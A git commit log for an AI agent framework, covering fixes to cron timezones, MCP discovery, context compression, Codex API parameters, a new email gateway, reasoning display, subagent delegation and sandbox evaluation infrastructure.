82113f1f1e docs: conditional skill activation — tag duckduckgo-search as web fallback and add documentation
- Tag duckduckgo-search skill with fallback_for_toolsets: [web] so it
  auto-hides when Firecrawl is available and auto-shows when it isn't
- Add 'Conditional Activation' section to CONTRIBUTING.md with full
  spec, semantics, and examples for all 4 frontmatter fields
- Add 'Conditional Activation (Fallback Skills)' section to the user-
  facing skills docs with field reference table and practical example
- Update SKILL.md format examples in both docs to show the new fields

Follow-up to PR #785 (conditional skill activation feature).
2026-03-11 08:47:01 -07:00
Erosika
047b118299 fix(honcho): resolve review blockers for merge
Address merge-blocking review feedback by removing unsafe signal handler overrides, wiring next-turn Honcho prefetch, restoring per-directory session defaults, and exposing all Honcho tools to the model surface. Also harden prefetch cache access with public thread-safe accessors and remove duplicate browser cleanup code.

Made-with: Cursor
2026-03-11 11:46:37 -04:00
Teknium
01d3b31479 Merge PR #785: feat: conditional skill activation based on tool availability
Authored by teyrebaz33. Closes #539.

feat: conditional skill activation based on tool availability
2026-03-11 08:43:30 -07:00
teknium1
a5ffa1278c test(cron): add regression tests for _ensure_aware timezone conversion
Three new tests for the naive timestamp fix (PR #807):
- test_ensure_aware_naive_preserves_absolute_time: verifies UTC equivalent
  is preserved when interpreting naive datetimes as system-local time
- test_ensure_aware_normalizes_aware_to_hermes_tz: verifies already-aware
  datetimes are normalized to Hermes tz without shifting the instant
- test_ensure_aware_due_job_not_skipped_when_system_ahead: end-to-end
  regression test for the original bug scenario
2026-03-11 08:42:04 -07:00
Teknium
b7d58320a8 Merge pull request #947 from NousResearch/hermes/hermes-cf9f7d54
fix(doctor): skip /models health check for MiniMax providers
2026-03-11 08:41:29 -07:00
0xNyk
605ba4adea fix(cron): interpret naive timestamps as local time in due-job checks
Legacy cron job rows may store next_run_at without timezone info.
_ensure_aware() previously stamped the Hermes-configured tz directly
via replace(tzinfo=...), which shifts absolute time when system-local
tz differs from Hermes tz — causing overdue jobs to appear not due.

Now: naive datetimes are interpreted as system-local wall time first,
then converted to Hermes tz. Aware datetimes are normalized to Hermes
tz for consistency.
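
The corrected conversion, sketched (hermes_tz stands in for the
configured timezone):

  from datetime import datetime
  from zoneinfo import ZoneInfo

  def _ensure_aware(dt: datetime, hermes_tz: ZoneInfo) -> datetime:
      if dt.tzinfo is None:
          # naive values are wall time in the SYSTEM zone; astimezone()
          # on a naive datetime attaches local tz without shifting it
          dt = dt.astimezone()
      # normalize to Hermes tz, preserving the absolute instant
      return dt.astimezone(hermes_tz)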

Cherry-picked from PR #807, rebased onto current main.
Fixes #806

Co-authored-by: 0xNyk <0xNyk@users.noreply.github.com>
2026-03-11 08:38:24 -07:00
Teknium
24a0c08d58 Merge pull request #796 from 0xbyt4/fix/discovery-failed-count
Clean bug fix — failed MCP server connections were silently swallowed, making failed_count dead code. Well-tested.
2026-03-11 08:32:32 -07:00
Bartok9
b4a100dfc0 fix(doctor): skip /models health check for MiniMax providers
MiniMax APIs (global and China) don't support /v1/models, causing
hermes doctor to always show HTTP 404 even with valid API keys.
Skip the HTTP check for these providers and show '(key configured)'
when the API key is present.

Cherry-picked from PR #822 by Bartok9, rebased onto current main.

Fixes #811

Co-authored-by: Bartok9 <259807879+Bartok9@users.noreply.github.com>
2026-03-11 08:29:35 -07:00
0xbyt4
4a8f23eddf fix: correctly track failed MCP server connections in discovery
_discover_one() caught all exceptions and returned [], making
asyncio.gather(return_exceptions=True) redundant. The
isinstance(result, Exception) branch in _discover_all() was dead
code, so failed_count was always 0. This caused:
- No summary printed when all servers fail (silent failure)
- ok_servers always equaling total_servers (misleading count)
- Unused variables transport_desc and transport_type

Fix: let exceptions propagate to gather() so failed_count increments
correctly. Move per-server failure logging to _discover_all(). Remove
dead variables.
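
The corrected accounting, sketched (discover_one stands in for the
per-server coroutine):

  import asyncio

  async def discover_one(server):
      # real version connects to the MCP server; raises on failure
      raise ConnectionError(f"cannot reach {server}")

  async def _discover_all(servers):
      results = await asyncio.gather(
          *(discover_one(s) for s in servers), return_exceptions=True
      )
      tools, failed = [], 0
      for server, result in zip(servers, results):
          if isinstance(result, Exception):   # now reachable
              failed += 1
              print(f"{server}: {result}")
          else:
              tools.extend(result)
      return tools, failed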
2026-03-11 18:24:45 +03:00
teknium1
a54405e339 fix: proactive compression after large tool results + Anthropic error detection
Two fixes for context overflow handling:

1. Proactive compression after tool execution: The compression check now
   estimates the next prompt size using real token counts from the last API
   response (prompt_tokens + completion_tokens) plus a conservative estimate
   of newly appended tool results (chars // 3 for JSON-heavy content).
   Previously, should_compress() only checked last_prompt_tokens which
   didn't account for tool results — so a 130k prompt + 100k chars of tool
   output would pass the 140k threshold check but fail the 200k API limit.

2. Safety net: Added 'prompt is too long' to context-length error detection
   phrases. Anthropic returns 'prompt is too long: N tokens > M maximum'
   on HTTP 400, which wasn't matched by existing phrases. This ensures
   compression fires even if the proactive check underestimates.
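
The estimate in sketch form (threshold plumbing omitted):

  def should_compress_proactively(prompt_tokens: int, completion_tokens: int,
                                  new_tool_chars: int, threshold: int) -> bool:
      # real token counts from the last response plus a conservative
      # chars // 3 estimate for the JSON-heavy tool output just appended
      estimated_next_prompt = prompt_tokens + completion_tokens + new_tool_chars // 3
      return estimated_next_prompt >= threshold

  # 130k prompt + 100k chars of tool output now trips a 140k threshold
  print(should_compress_proactively(130_000, 2_000, 100_000, 140_000))  # True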

Fixes #813
2026-03-11 08:04:52 -07:00
teknium1
efb780c754 Revert "fix: smart vision setup that respects the user's chosen provider"
This reverts commit c64efa9260.
2026-03-11 07:59:00 -07:00
teknium1
c64efa9260 fix: smart vision setup that respects the user's chosen provider
The old flow blindly asked for an OpenRouter API key after ANY non-OR
provider selection, even for Nous Portal and Codex which already
support vision natively. This was confusing and annoying.

New behavior:
- OpenRouter: skip — vision uses Gemini via their OR key
- Nous Portal OAuth: skip — vision uses Gemini via Nous
- OpenAI Codex: skip — gpt-5.3-codex supports vision
- Custom endpoint (api.openai.com): show OpenAI vision model picker
  (gpt-4o, gpt-4o-mini, gpt-4.1, etc.), saves AUXILIARY_VISION_MODEL
- Custom (other) / z.ai / kimi / minimax / nous-api:
  - First checks if existing OR/Nous creds already cover vision
  - If not, offers friendly choice: OpenRouter / OpenAI / Skip
  - No more 'enter OpenRouter key' thrown in your face

Also fixes the setup summary to check actual vision availability
across all providers instead of hardcoding 'requires OPENROUTER_API_KEY'.
MoA still correctly requires OpenRouter (calls multiple frontier models).
2026-03-11 07:48:44 -07:00
teknium1
43cb35cb21 docs: list individual config commands first, then hermes setup as all-in-one
Show users the specific commands for each config area (hermes model,
hermes tools, hermes config set, hermes gateway setup) and then
present 'hermes setup' as the option to configure everything at once.
2026-03-11 07:30:28 -07:00
teknium1
db496180db docs: remove hermes setup from install flow, point to hermes model/tools instead
The installer already handles full setup (provider config, etc.), so
telling users to run 'hermes setup' post-install is redundant and
confusing. Updated all docs to reflect the correct flow:

1. Run the installer (handles everything including provider setup)
2. Use 'hermes model', 'hermes tools', 'hermes gateway setup' to
   reconfigure individual settings later

Files updated:
- README.md: removed setup from quick install & getting started
- installation.md: updated post-install, manual step 9, troubleshooting
- quickstart.md: updated provider section & quick reference table
- cli-commands.md: updated hermes setup description
- faq.md: replaced hermes setup references with specific commands
2026-03-11 07:28:05 -07:00
Teknium
c69adfbb17 Merge pull request #825 from JackTheGit/fix/docs-typos-batch2
Fix several documentation typos
2026-03-11 07:13:24 -07:00
teknium1
683c8b24d4 fix: reduce max_retries to 3 and make ValueError/TypeError non-retryable
- max_retries reduced from 6 to 3 — 6 retries with exponential backoff
  could stall for ~275s total on persistent errors
- ValueError and TypeError now detected as non-retryable client errors
  and abort immediately instead of being retried with backoff (these are
  local validation/programming errors that will never succeed on retry)
2026-03-11 07:04:46 -07:00
teknium1
d2dee43825 fix: allow tool_choice, parallel_tool_calls, prompt_cache_key in codex preflight
_preflight_codex_api_kwargs rejected these three fields as unsupported,
but _build_api_kwargs adds them to every codex request. This caused a
ValueError before _interruptible_api_call was reached, which was caught
by the retry loop and retried with exponential backoff — appearing as
an infinite hang in tests (275s total backoff across 6 retries).

The fix adds these keys to allowed_keys and passes them through to the
normalized request dict.

This fixes the hanging test_cron_run_job_codex_path_handles_internal_401_refresh
test (now passes in 2.6s instead of timing out).
2026-03-11 07:00:14 -07:00
dmahan93
59b53f0a23 fix: skip tests when atroposlib/minisweagent unavailable in CI
- test_agent_loop_tool_calling.py: import atroposlib at module level
  to trigger skip (environments.agent_loop is now importable without
  atroposlib due to __init__.py graceful fallback)
- test_modal_sandbox_fixes.py: skip TestToolResolution tests when
  minisweagent not installed
2026-03-11 06:52:55 -07:00
dmahan93
d198a647e2 fix: guard all atroposlib imports for CI without atropos installed
- environments/__init__.py: try/except on atroposlib imports so
  submodules like tool_call_parsers remain importable standalone
- test_agent_loop.py, test_tool_call_parsers.py,
  test_managed_server_tool_support.py: skip at module level when
  atroposlib is missing
2026-03-11 06:52:55 -07:00
dmahan93
0f53275169 test: skip atropos-dependent tests when atroposlib not installed
Guard all test files that import from environments/ or atroposlib
with try/except + pytest.skip(allow_module_level=True) so they
gracefully skip instead of crashing when deps aren't available.
2026-03-11 06:52:55 -07:00
dmahan93
366de72a38 add a local vllm instance 2026-03-11 06:52:55 -07:00
dmahan93
13f5459670 fix: use ManagedServer for vLLM in TBLite eval + local_vllm config
TBLite eval was bypassing ManagedServer and calling ServerManager
directly, which uses /v1/chat/completions — not available on the
atropos vllm_api_server (/generate only).

Now uses _use_managed_server() to detect vLLM/SGLang backends and
route through ManagedServer (Phase 2) with proper tool_parser and
/generate endpoint. Falls back to Phase 1 for OpenAI endpoints.

Also adds local_vllm.yaml config for running against a local vLLM
server with Docker sandboxes.
2026-03-11 06:52:55 -07:00
dmahan93
93333387d6 fix: handle dict and object tool_calls in agent loop
vLLM's ToolCallTranslator returns tool_calls as dicts, while
OpenAI API returns them as objects with .id, .function.name etc.
Normalize both formats in the agent loop.
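
Sketch of the normalization described above (dict layout per vLLM's
translator, attribute layout per the OpenAI SDK):

  def normalize_tool_call(tc) -> dict:
      if isinstance(tc, dict):   # vLLM ToolCallTranslator output
          return {
              "id": tc["id"],
              "name": tc["function"]["name"],
              "arguments": tc["function"]["arguments"],
          }
      return {                   # OpenAI SDK object
          "id": tc.id,
          "name": tc.function.name,
          "arguments": tc.function.arguments,
      }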
2026-03-11 06:52:26 -07:00
dmahan93
1f9e7cd659 test: 5 vLLM integration tests + fallback tool call parser
Tests hit a real vLLM server (Qwen/Qwen3-4B-Thinking-2507) via
ManagedServer Phase 2. Auto-skip if server isn't running.

Tests verify:
- Single tool call through full agent loop
- Multi-tool calls across turns
- ManagedServer produces SequenceNodes with tokens/logprobs
- Direct response without tools
- Thinking model produces <think> blocks

Also adds fallback parser in agent_loop.py: when ManagedServer's
ToolCallTranslator can't parse (vLLM not installed), hermes-agent's
standalone parsers extract <tool_call> tags from raw content.
2026-03-11 06:52:26 -07:00
dmahan93
09fc64c6b6 add eval output to gitignore 2026-03-11 06:52:26 -07:00
dmahan93
84147f4d81 refactor: update to new atropos tool-calling API
Migrate from old tool_call_parser (instance) to new ToolCallTranslator
pattern from atropos add-openai-endpoint-for-managed-server branch:

- Set tool_parser on ServerManager (string name, e.g. 'hermes')
- Use managed_server(tokenizer=..., preserve_think_blocks=...)
  instead of managed_server(tokenizer=..., tool_call_parser=instance)
- ManagedServer now handles tool call translation internally via
  ToolCallTranslator (bidirectional raw text <-> OpenAI tool_calls)
- Remove old parser loading code (get_parser/KeyError fallback)

The hermes-agent tool_call_parsers/ directory is preserved as a
standalone fallback for environments that don't use vLLM's parsers.
2026-03-11 06:52:26 -07:00
dmahan93
ee4b20b55b test: 9 agent loop tool-calling integration tests
Real LLM calls via OpenRouter using stepfun/step-3.5-flash:free (zero cost).
Falls back to paid models if free model is unavailable.

Tests: single tool call, multi-tool single turn, multi-turn chains,
unknown tool rejection, max_turns limit, direct response (no tools),
tool error handling, AgentResult structure, conversation history.
2026-03-11 06:52:26 -07:00
dmahan93
ed27b826c5 feat: add eval_concurrency limit + Docker local config for TBLite
- Add eval_concurrency config field with asyncio.Semaphore
- Add local.yaml config using Docker backend (sandboxed, no cloud costs)
- Register docker_image alongside modal_image for backend flexibility
- Default: 8 parallel tasks for local runs
2026-03-11 06:52:26 -07:00
dmahan93
b03aefaf20 test: 13 tests for Modal sandbox infra fixes 2026-03-11 06:51:42 -07:00
dmahan93
d7f4db53f5 fix: Modal sandbox eval infra (9 fixes for TBLite baseline)
Fixes discovered while running TBLite baseline evaluation:

1. ephemeral_disk param not supported in modal 1.3.5 - check before passing
2. Modal legacy image builder requires working pip - add ensurepip fix via
   setup_dockerfile_commands to handle task images with broken pip
3. Host cwd leaked into Modal sandbox - add /home/ to host prefix check
4. Tilde ~ not expanded by subprocess.run(cwd=) in sandboxes - use /root
5. install_pipx must stay True for swerex-remote to be available

Dependencies also needed (not in this commit):
- git submodule update --init mini-swe-agent
- uv pip install swe-rex boto3
2026-03-11 06:51:42 -07:00
dmahan93
2c97bf3936 Add tests for atropos tool calling integration
- test_tool_call_parsers.py: 16 tests for parser registry, hermes parser
  (single/multiple/truncated/malformed), and ParseResult contract validation
- test_agent_loop.py: 21 tests for HermesAgentLoop with mock servers
  (text responses, tool calls, max turns, unknown tools, API errors,
  extra_body forwarding, managed state, blocked tools, reasoning extraction)
- test_managed_server_tool_support.py: 9 tests validating API compatibility
  between hermes-agent and atroposlib's ManagedServer tool_call_parser support
  (gracefully skips on baseline atroposlib, passes on tool_call_support branch)
2026-03-11 06:51:26 -07:00
teknium1
1dfa544250 Merge PR #802: test: parallelize test suite with pytest-xdist
Adds pytest-xdist to dev dependencies and -n auto to default pytest addopts
for parallel test execution across CPU cores.

Authored by OutThisLife.

Co-authored-by: OutThisLife <OutThisLife@users.noreply.github.com>
2026-03-11 06:43:00 -07:00
teknium1
eac5f8f40f fix: wire email platform into toolset mappings + add documentation
Post-merge fixes for the email gateway (PR #797):

1. Add Platform.EMAIL to all 4 platform-to-toolset/config mapping
   dicts in gateway/run.py. Without this, email sessions silently
   fell back to the Telegram toolset because these dicts were added
   after the PR branched off main.

2. Add email (and signal) to hermes_cli/tools_config.py and
   hermes_cli/skills_config.py PLATFORMS dicts so they appear in
   'hermes tools' and 'hermes skills' CLI commands.

3. Add full email setup documentation:
   - website/docs/user-guide/messaging/email.md — setup guide with
     Gmail/Outlook instructions, configuration, troubleshooting,
     security advice, and env var reference
   - Update messaging/index.md — add email to architecture diagram,
     platform toolset table, security examples, and next steps
2026-03-11 06:34:32 -07:00
teknium1
184aa5b2b3 fix: tighten exc_info assertion in vision test (from PR #803)
The weaker assertion (r.exc_info is not None) passes even when
exc_info is (None, None, None). Check r.exc_info[0] is not None
to verify actual exception info is present.

The _aux_async_client mock was already applied on main.

Co-authored-by: OutThisLife <nickolasgustafsson@gmail.com>
2026-03-11 06:32:01 -07:00
0xbyt4
bdcf247efe feat: add email gateway platform (IMAP/SMTP)
Allow users to interact with Hermes by sending and receiving emails.
Uses IMAP polling for incoming messages and SMTP for replies with
proper threading (In-Reply-To, References headers).

Integrates with all 14 gateway extension points: config, adapter
factory, authorization, send_message tool, cron delivery, toolsets,
prompt hints, channel directory, setup wizard, status display, and
env example.

65 tests covering config, parsing, dispatch, threading, IMAP fetch,
SMTP send, attachments, and all integration points.
2026-03-11 06:32:01 -07:00
Teknium
b16d7f2da6 Merge pull request #921 from NousResearch/hermes/hermes-ece5a45c
feat(cli): add /reasoning command for effort level and display toggle
2026-03-11 06:30:20 -07:00
teknium1
9423fda5cb feat: configurable subagent provider:model with full credential resolution
Adds delegation.model and delegation.provider config fields so subagents
can run on a completely different provider:model pair than the parent agent.

When delegation.provider is set, the system resolves the full credential
bundle (base_url, api_key, api_mode) via resolve_runtime_provider() —
the same path used by CLI/gateway startup. This means all configured
providers work out of the box: openrouter, nous, zai, kimi-coding,
minimax, minimax-cn.

Key design decisions:
- Provider resolution uses hermes_cli.runtime_provider (single source of
  truth for credential resolution across CLI, gateway, cron, and now
  delegation)
- When only delegation.model is set (no provider), the model name changes
  but parent credentials are inherited (for switching models within the
  same provider like OpenRouter)
- When delegation.provider is set, full credentials are resolved
  independently — enabling cross-provider delegation (e.g. parent on
  Nous Portal, subagents on OpenRouter)
- Clear error messages if provider resolution fails (missing API key,
  unknown provider name)
- _load_config() now falls back to hermes_cli.config.load_config() for
  gateway/cron contexts where CLI_CONFIG is unavailable

Based on PR #791 by 0xbyt4 (closes #609), reworked to use proper
provider credential resolution instead of passing provider as metadata.

Co-authored-by: 0xbyt4 <0xbyt4@users.noreply.github.com>
2026-03-11 06:12:21 -07:00
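
A sketch of the resolution rule this commit describes: provider set means resolve a full credential bundle, only model set means inherit parent credentials. resolve_runtime_provider is named in the commit, but its return shape and the config layout here are assumptions.

```python
def resolve_runtime_provider(name: str) -> dict:
    # stands in for hermes_cli.runtime_provider's real resolver
    return {"base_url": "", "api_key": "", "api_mode": "", "default_model": ""}

def subagent_runtime(cfg: dict, parent: dict) -> dict:
    delegation = cfg.get("delegation", {})
    provider, model = delegation.get("provider"), delegation.get("model")
    if provider:
        # full credential bundle -> cross-provider delegation
        creds = resolve_runtime_provider(provider)
        return {**creds, "model": model or creds.get("default_model")}
    if model:
        # same credentials, different model within the parent's provider
        return {**parent, "model": model}
    return parent
```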
teknium1
4d873f77c1 feat(cli): add /reasoning command for effort level and display toggle
Combined implementation of reasoning management:
- /reasoning              Show current effort level and display state
- /reasoning <level>      Set reasoning effort (none, low, medium, high, xhigh)
- /reasoning show|on      Show model thinking/reasoning in output
- /reasoning hide|off     Hide model thinking/reasoning from output

Effort level changes persist to config and force agent re-init.
Display toggle updates the agent callback dynamically without re-init.

When display is enabled:
- Intermediate reasoning shown as dim [thinking] lines during tool loops
- Final reasoning shown in a bordered box above the response
- Long reasoning collapsed (5 lines intermediate, 10 lines final)

Also adds:
- reasoning_callback parameter to AIAgent
- last_reasoning in run_conversation result dict
- show_reasoning config option (display section, default: false)
- Display section in /config output
- 34 tests covering both features

Combines functionality from PR #789 and PR #790.

Co-authored-by: Aum Desai <Aum08Desai@users.noreply.github.com>
Co-authored-by: 0xbyt4 <35742124+0xbyt4@users.noreply.github.com>
2026-03-11 06:02:18 -07:00
teknium1
09336a6710 Merge PR #795: fix: handle empty choices in MCP sampling callback
Adds defensive guard against empty/None/missing choices in SamplingHandler.__call__
before accessing response.choices[0]. Returns proper ErrorData instead of crashing
with IndexError/TypeError on content filtering, provider errors, or rate limits.

Authored by 0xbyt4.

Co-authored-by: 0xbyt4 <0xbyt4@users.noreply.github.com>
2026-03-11 05:47:51 -07:00
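
A sketch of the defensive pattern this fix adds; the handler shape and how the caller maps a missing choice to ErrorData are assumptions.

```python
def first_choice_or_none(response):
    choices = getattr(response, "choices", None)
    if not choices:  # None, missing attribute, or empty list
        return None  # caller returns ErrorData instead of crashing
    return choices[0]
```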
aydnOktay
9149c34a26 refactor(slack): replace print statements with structured logging
Replaces all ad-hoc print() calls in the Slack gateway adapter with
proper logging.getLogger(__name__) calls, matching the pattern already
used by every other platform adapter (telegram, discord, whatsapp,
signal, homeassistant).

Changes:
- Add import logging + module-level logger
- Use logger.error for failures, logger.warning for non-critical
  fallbacks, logger.info for status, logger.debug for routine ops
- Add exc_info=True for full stack traces on all error/warning paths
- Use %s format strings (lazy evaluation) instead of f-strings
- Wrap disconnect() in try/except for safety
- Add structured context (file paths, channel IDs, URLs) to log messages
- Convert document handling prints added after the original PR

Cherry-picked from PR #778 by aydnOktay, rebased onto current main
with conflict resolution and extended to cover document/video methods
added since the PR was created.

Co-authored-by: aydnOktay <xaydinoktay@gmail.com>
2026-03-11 05:34:43 -07:00
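
The stdlib logging pattern this commit applies, in miniature; the upload function is a placeholder.

```python
import logging

logger = logging.getLogger(__name__)

def _do_upload(path: str, channel_id: str) -> None:
    raise RuntimeError("placeholder for the real Slack upload call")

def upload_file(path: str, channel_id: str) -> None:
    try:
        _do_upload(path, channel_id)
    except Exception:
        # %s defers formatting until the record is actually emitted;
        # exc_info=True attaches the full stack trace.
        logger.error("file upload failed: path=%s channel=%s",
                     path, channel_id, exc_info=True)
```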
teknium1
c837ef949d fix: replace debug print() with logger.error() in file_tools
Stray print() in write_file_tool exception handler leaked debug output
to stdout. Replaced with logger.error() which is already set up in
the file.

Authored by memosr.

Co-authored-by: memosr <memosr@users.noreply.github.com>
2026-03-11 04:38:07 -07:00
balyan.sid@gmail.com
1d4a23fa6c fix: add missing packages to setuptools config for non-editable installs
- Add `agent`, `tools.*`, `gateway.*` to packages.find include
- Add `hermes_state`, `hermes_time`, `mini_swe_runner`, `rl_cli`, `utils` to py-modules
- Move rl_training_tool LOGS_DIR to ~/.hermes/logs/rl_training/ (was writing
  into the package source tree, which fails on read-only installs)

These were masked in development (editable installs see the whole source tree)
but broke any non-editable install like `pip install .` or wheel builds.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-11 17:07:29 +05:30
teknium1
a71736ea73 Merge PR #910: fix: add missing Responses API parameters for Codex provider
Adds tool_choice=auto, parallel_tool_calls=true, and prompt_cache_key
to Codex Responses API requests, matching the official Codex CLI.
Root cause fix for #747 (agent claiming no shell access).
2026-03-11 04:28:52 -07:00
teknium1
a82ce60294 fix: add missing Responses API parameters for Codex provider
Adds tool_choice, parallel_tool_calls, and prompt_cache_key to the
Codex Responses API request kwargs — matching what the official Codex
CLI sends.

- tool_choice: 'auto' — enables the model to proactively call tools.
  Without this, the model may default to not using tools, which explains
  reports of the agent claiming it lacks shell access (#747).
- parallel_tool_calls: True — allows the model to issue multiple tool
  calls in a single turn for efficiency.
- prompt_cache_key: session_id — enables server-side prompt caching
  across turns in the same session, reducing latency and cost.

Refs #747
2026-03-11 04:28:31 -07:00
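
A sketch of the extra request kwargs; the three parameter names come from the commit message itself, while the surrounding helper is an assumption.

```python
def codex_responses_kwargs(session_id: str) -> dict:
    return {
        "tool_choice": "auto",           # let the model decide to call tools
        "parallel_tool_calls": True,     # multiple tool calls per turn
        "prompt_cache_key": session_id,  # server-side prompt caching per session
    }
```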
teknium1
69090d6da1 fix: add **kwargs to base/telegram media send methods for metadata routing
The MEDIA routing in _process_message_background passes
metadata=_thread_metadata to send_video, send_document, and
send_image_file — but none accepted it, causing TypeError silently
caught by the except handler. Files just failed to send.

Fix: add **kwargs to all four base class media methods and their
Telegram overrides.
2026-03-11 03:24:39 -07:00
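
Why **kwargs fixes the silent TypeError, sketched: the router passes metadata= to every media method, so each signature must tolerate it. Class and method names are illustrative.

```python
class BasePlatformAdapter:
    async def send_video(self, chat_id: str, path: str, **kwargs) -> None:
        # kwargs may carry metadata={"thread_id": ...}; adapters without
        # thread support can simply ignore it instead of raising TypeError.
        raise NotImplementedError
```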
teknium1
322ffbed61 Merge PR #779: feat: Telegram native file attachment support (send_document + send_video)
Adds send_document() and send_video() overrides to TelegramAdapter.
Requested by TigerHix.
2026-03-11 03:23:11 -07:00
Teknium
fe9da5280f Merge pull request #766 from spanishflu-est1918/codex/telegram-topic-session-pr
Isolate Telegram forum topic sessions — each topic gets its own independent session key, history, and interrupt tracking. Progress, hygiene, and cron messages all route to the correct topic.
2026-03-11 03:14:43 -07:00
teknium1
4864a5684a refactor: extract shared curses checklist, fix skill discovery perf
Four cleanups to code merged today:

1. New hermes_cli/curses_ui.py — shared curses_checklist() used by both
   hermes tools and hermes skills. Eliminates ~140 lines of near-identical
   curses code (scrolling, key handling, color setup, numbered fallback).

2. Fix _find_all_skills() perf — was calling load_config() per skill
   (~100+ YAML parses). Now loads disabled set once via
   _get_disabled_skill_names() and does a set lookup.

3. Eliminate _list_all_skills_unfiltered() duplication — _find_all_skills()
   now accepts skip_disabled=True for the config UI, removing 30 lines
   of copy-pasted discovery logic from skills_config.py.

4. Fix fragile label round-trip in skills_command — was building label
   strings, passing to checklist, then mapping labels back to skill names
   (collision-prone). Now works with indices directly, like tools_config.
2026-03-11 03:06:15 -07:00
alireza78a
f1510ec33e test(terminal): add tests for env var validation in _get_env_config 2026-03-11 02:59:12 -07:00
alireza78a
4523cc09cf fix(terminal): validate env var types with clear error messages 2026-03-11 02:59:12 -07:00
teknium1
f524aed23e fix: clean up empty file after failed wl-paste clipboard extraction
When wl-paste produces empty output, the destination file was left as
a 0-byte orphan. Added dest.unlink() before returning False, matching
the existing cleanup pattern in the exception handler.

Authored by 0xbyt4.

Co-authored-by: 0xbyt4 <0xbyt4@users.noreply.github.com>
2026-03-11 02:56:19 -07:00
teknium1
925f378baa Merge PR #773: feat(cli,gateway): add /personality none and custom personality support
Authored by teyrebaz33. Closes #643.

- /personality none/default/neutral clears system prompt overlay
- Dict format personalities with description, tone, style fields
- Works in both CLI and gateway
- 18 tests
2026-03-11 02:54:27 -07:00
teknium1
fe29594716 fix: replace blocking time.sleep with await asyncio.sleep in WhatsApp connect
time.sleep(1) inside async def connect() blocks the entire event loop.
Replaced with await asyncio.sleep(1) to properly yield control.

Authored by 0xbyt4. Fixes blocking sleep in WhatsApp bridge startup.

Co-authored-by: 0xbyt4 <0xbyt4@users.noreply.github.com>
2026-03-11 02:51:49 -07:00
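
The one-line difference, for reference: time.sleep blocks the whole event loop, await asyncio.sleep suspends only this coroutine.

```python
import asyncio

async def connect() -> None:
    # time.sleep(1)         # blocks every other task on the loop
    await asyncio.sleep(1)  # yields control while waiting
```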
teknium1
7721518591 Merge PR #770: fix: off-by-one in setup toggle selection error message
Authored by 0xbyt4. Error message showed 'between 1 and N+1' instead
of 'between 1 and N' for N items.
2026-03-11 02:50:52 -07:00
teknium1
6e303def12 Merge PR #757: security: enforce 0600/0700 file permissions on sensitive files
Enforces owner-only permissions on files containing secrets:
- config.yaml, .env → 0600
- ~/.hermes/, cron dirs → 0700
- cron jobs.json, output files → 0600

Windows-safe (all chmod calls wrapped in try/except).
Inspired by openclaw v2026.3.7.
2026-03-11 02:48:56 -07:00
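
A sketch of the Windows-safe chmod pattern described above; the paths are examples, not the full list the commit covers.

```python
import os
from pathlib import Path

def harden(path: Path, mode: int) -> None:
    try:
        os.chmod(path, mode)  # 0o600 for secret files, 0o700 for dirs
    except OSError:
        pass  # e.g. Windows, where POSIX modes don't fully apply

harden(Path.home() / ".hermes" / "config.yaml", 0o600)
harden(Path.home() / ".hermes", 0o700)
```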
teknium1
ad1fbd88b2 Merge feature/background-command: add /background slash command
Adds /background <prompt> command to both CLI and gateway platforms.
Spawns a new agent session in the background — users can keep chatting
while the task runs, and results are delivered when done.

CLI: threaded execution with rich Panel output
Gateway: asyncio task with platform adapter delivery (text, images, media)

Includes 15 new tests and updates to command registry.
2026-03-11 02:46:37 -07:00
teknium1
b8067ac27e feat: add /background command to gateway and CLI commands registry
Add /background <prompt> to the gateway, allowing users on Telegram,
Discord, Slack, etc. to fire off a prompt in a separate agent session.
The result is delivered back to the same chat when done, without
modifying the active conversation history.

Implementation:
- _handle_background_command: validates input, spawns asyncio task
- _run_background_task: creates AIAgent in executor thread, delivers
  result (text, images, media files) back via the platform adapter
- Inherits model, toolsets, provider routing from gateway config
- Error handling with user-visible failure messages

Also adds /background to hermes_cli/commands.py registry so it
appears in /help and autocomplete.

Tests: 15 new tests covering usage, task creation, uniqueness,
multi-platform, error paths, and help/autocomplete integration.
2026-03-11 02:46:31 -07:00
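
A sketch of the spawn pattern described: the handler schedules an asyncio task that runs the blocking agent call in an executor thread, then delivers the result via the adapter. Names and callback shapes are illustrative.

```python
import asyncio

_background_tasks: set = set()

async def handle_background(prompt: str, run_agent, deliver) -> None:
    loop = asyncio.get_running_loop()

    async def _task() -> None:
        # blocking agent call runs in a thread; result goes back to the chat
        result = await loop.run_in_executor(None, run_agent, prompt)
        await deliver(result)

    task = asyncio.create_task(_task())
    _background_tasks.add(task)  # keep a reference so the task isn't GC'd
    task.add_done_callback(_background_tasks.discard)
```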
teknium1
bd2606a576 fix: initialize self.config in HermesCLI to fix AttributeError on slash commands
HermesCLI.__init__ never assigned self.config, causing an
AttributeError ('HermesCLI' object has no attribute 'config')
whenever an unrecognized slash command fell through to the
quick_commands check on line 2838. This affected skill slash
commands like /x-thread-creation since the quick_commands lookup
runs before the skill command check.

Set self.config = CLI_CONFIG in __init__ to match the pattern used
by the gateway (run.py:199).
2026-03-11 02:33:31 -07:00
teknium1
f5324f9aa5 fix: initialize self.config in HermesCLI to fix AttributeError on slash commands
HermesCLI.__init__ never assigned self.config, causing an
AttributeError ('HermesCLI' object has no attribute 'config')
whenever an unrecognized slash command fell through to the
quick_commands check (line 2832). This broke skill slash commands
like /x-thread-creation since the quick_commands lookup runs
before the skill command check.

Set self.config = CLI_CONFIG in __init__, matching the pattern
used by the gateway (run.py:199).
2026-03-11 02:33:25 -07:00
SPANISH FLU
de2b881886 test(cron): cover topic thread delivery metadata 2026-03-11 09:22:32 +01:00
SPANISH FLU
0d6b25274c fix(gateway): isolate telegram forum topic sessions 2026-03-11 09:15:34 +01:00
teknium1
fbfdde496b docs: update AGENTS.md with new files and test count
- Add hermes_cli/ files: skills_config, tools_config, skills_hub, models, auth
- Add acp_adapter/ directory
- Update test count: ~2500 → ~3000 (~3 min runtime)
2026-03-11 00:54:49 -07:00
Bartok Moltbot
ae1c11c5a5 fix(cli): resolve duplicate 'skills' subparser crash on Python 3.11+
Fixes #898 — Python 3.11 changed argparse to raise an exception on
duplicate subparser names (CPython #94331). The 'skills' name was
registered twice: once for Skills Hub and once for skills config.

Changes:
- Remove duplicate 'skills' subparser registration
- Add 'config' as a sub-action under the existing 'hermes skills' command
- Route 'hermes skills config' to skills_config module
- Add regression test to catch future duplicates

Migration: 'hermes skills' (config) is now 'hermes skills config'
2026-03-11 00:50:39 -07:00
Teknium
5abee4fb23 Merge pull request #769 from 0xbyt4/fix/codex-models-visibility-mismatch
